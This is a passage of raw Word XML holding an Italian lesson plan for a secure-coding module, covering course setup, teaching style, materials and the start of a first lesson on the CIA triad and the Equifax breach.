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footer1.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.footer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"1-2" \h \z \u</w:instrText>
            <w:fldChar w:fldCharType="separate"/>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="89" w:name="X713ef0d64838a15c6082755a3bc2df2338de656"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Piano dettagliato delle lezioni — Modulo Secure Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Corso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: IFTS STEM — Specialista nelle Tecniche di Evoluzione e Manutenzione del Software</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Secure Coding (~16h, all’interno di UF 10/11/12)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modalità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 8 incontri × 2h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Discenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 20 giovani/adulti con diploma, in possesso di basi di programmazione (provenienti dalle UF 9-10 del corso)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Linguaggio principale lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3.12 + Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(con esempi cross-lang Java/PHP/JS nelle slide)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Approccio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“vedi rotto → ripara”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(costruzione di app vulnerabile, sfruttamento, correzione)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Verifica finale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: lab pratico di code review su app vulnerabile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="80" w:name="indice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Indice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="prem">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Premessa per il docente</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="prep">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Materiali di base da preparare prima</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L1 — Perché secure coding</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L2 — OWASP Top 10 + Threat Modeling</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L3 — SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L4 — Broken Access Control + Password hashing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L5 — XSS + Header HTTP</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L6 — Input validation + Supply chain</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L7 — Documentazione sicurezza + Uso responsabile dell’AI</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="l8">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">L8 — Lab integrato + Verifica</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="val">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Valutazione</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="all">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t xml:space="preserve">Allegati e materiali distribuibili</w:t>
        </w:r>
      </w:hyperlink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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## Premessa per il docente</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="18" w:name="posizionamento-del-modulo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Posizionamento del modulo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo modulo si colloca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dopo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che i discenti hanno fatto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UF 9 (progettazione software) — conoscono OOP, ciclo di vita</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UF 10 (almeno la parte Python) — sanno scrivere semplici script + Flask hello-world</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UF 11 inizio — conoscono SQL basico e CSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">prima/parallelo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UF 12 (testing)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UF 13 (manutenzione)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UF 7 (documentazione) — collegamento L7</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="19" w:name="stile-didattico-raccomandato"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stile didattico raccomandato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Concretezza prima della teoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Apri ogni lezione con un caso reale.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Vedi attacco riuscire → poi spieghi difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Memorabilità ×10.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Lab guidato, non assegnato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il docente sta al banco, segue i discenti.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Errore come strumento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quando uno studente sbaglia, è un’occasione per spiegare a tutti.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Stampa e distribuisci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la Checklist Secure Coding da L1. Tienila sotto gli occhi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="19"/>
    <w:bookmarkStart w:id="20" w:name="cose-da-non-fare"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cose da NON fare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Frontale puro per 2h. Massimo 30 min consecutivi prima di un lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Sovraccarico di nomenclatura (OWASP, CWE, CVE, CVSS, STRIDE…). Spiega solo ciò che serve oggi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Aprire con la normativa. Si finirebbe per perdere la classe. La normativa è motivazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dopo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">aver capito la tecnica.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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## Materiali di base da preparare prima del corso</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="setup-tecnico"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup tecnico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Su ogni PC dei discenti (verificato prima di L1):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Già fatto in UF 10 (dovrebbe essere già pronto)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">python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--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ≥ 3.12</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">code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--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># VS Code</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> install flask pytest bcrypt bleach pydantic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="PreprocessorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> python-magic-bin requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica con un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hello.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Flask. Se non funziona → 15 min recupero a L1.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="materiali-del-repository"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali del repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/ss4i/corso-stem-ifts-secure-coding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: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01_checklist_secure_coding.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— stampare per ogni discente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02_template_documentazione_sicurezza.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— distribuire in L7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02_template_documentazione_sicurezza_ESEMPIO_COMPILATO.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— distribuire in L7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03_guida_validazione_codice_IA.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— distribuire in L7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/ss4i/corso-its-cybersecurity-32h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: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02_lab/M6_sqli_step_by_step/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— repo intero del lab SQLi (clone in L3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Slide selezionate da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">04_slide/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(M1, M6, M_EXTRA_input_validation) per supporto frontale</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="file-aula"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File aula</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stampe della Checklist Secure Coding (1 per discente)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stampe del briefing L8 (1 per discente)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proiettore con HDMI testato (slide pptx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wi-Fi aula con accesso a Internet per Git clone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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L1 — Perché secure coding (2h)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="obiettivi-formativi"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al termine della lezione il discente:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Sa definire la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CIA Triad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Confidentiality, Integrity, Availability) con esempi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Distingue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sicurezza del codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da sicurezza informatica/infrastrutturale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Cita almeno 3 casi reali di breach causati da errori di codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Conosce i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5 principi del Secure Coding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Least Privilege, Defense in Depth, Fail Secure, KISS, Separation of Duties)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5. Ha l’ambiente Python+Flask funzionante per i lab successivi</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="articolazione-minuto-per-minuto"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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458"/>
        <w:gridCol w:w="2084"/>
        <w:gridCol w:w="2084"/>
        <w:gridCol w:w="2292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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Materiali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Presentazione modulo, obiettivi, calendario, distribuzione</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Checklist Secure Coding</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">stampata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Slide intro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:10 – 0:25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Storytelling</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: Equifax 2017 (147M record) raccontato come storia.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">“Cosa hanno sbagliato?”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Slide caso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:25 – 0:40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CIA Triad</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con esempi pratici (saldo conto = I, password = C, sito durante saldi = A) + cenni Authenticity/Non-repudiation/Accountability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
